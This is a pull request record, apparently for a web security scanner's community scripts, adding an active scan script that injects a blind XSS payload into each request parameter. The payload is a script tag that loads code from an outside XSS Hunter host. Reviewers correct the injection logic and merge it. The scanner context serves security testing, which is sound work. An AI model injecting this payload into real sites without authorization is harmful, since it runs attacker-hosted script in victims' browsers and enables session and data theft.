### PR TITLE
inject blind xss payloads

### PR DESCRIPTION
**Pull request by knassar702**

### CODE REVIEW

File: active/bxss.py [hunk 1]
```diff
@@ -0,0 +1,25 @@
...
+bxss = '"><script src="//yourusername.xss.ht"></script>'
+def scanNode(sas, msg):
+
+  # Copy requests before reusing them
+  msg = msg.cloneRequest();
+
+  # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+  sas.sendAndReceive(msg, False, False);
+
+  # Test the responses and raise alerts as below
```
Comment (thc202) [inline active/bxss.py:13]: This should be removed.

**Comment by thc202** [comment]
The changelog should be updated.

**Comment by kingthorin** [comment]
@knassar702 are you going to address @thc202’s feedback?

**Comment by knassar702** [comment]
hello @thc202  @kingthorin  , im so sorry for this long time I was a bit busy because of studying , i changed it now

regards

**Comment by kingthorin** [comment]
Okay, I'll rebase and address the conflict tomorrow.

**Comment by kingthorin** [comment]
Done

**Comment by kingthorin** [comment]
Note: Before you make any further changes/contributions on this PR please ensure you do the following.

```
git fetch origin
git reset --hard origin/bxss
```

(That assumes origin is your remote fork.)

**Review by kingthorin — APPROVED** [review]

**Comment by kingthorin** [comment]
If others are good with this I can fix the conflict.

**Comment by thc202** [comment]
It seems there were too many changes, the `bxss` is no longer being injected and it's just sending unchanged messages.

**Comment by thc202** [comment]
This is what was intended I think:
```Python
# by: Khaled Nassar @knassar702

# YOUR XSSHUNTER PAYLOAD
bxss = '"><script src="//yourusername.xss.ht"></script>'
def scanNode(sas, msg):
  pass


def scan(sas, msg, param, value):

  # Copy requests before reusing them
  msg = msg.cloneRequest();

  # setParam (message, parameterName, newValue)
  sas.setParam(msg, param, bxss);

  # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
  sas.sendAndReceive(msg, False, False);
```

**Comment by kingthorin** [comment]
Should be good now I think

**Review by thc202 — APPROVED** [review]

**Comment by thc202** [comment]
Thank you both!

**Pull request merged**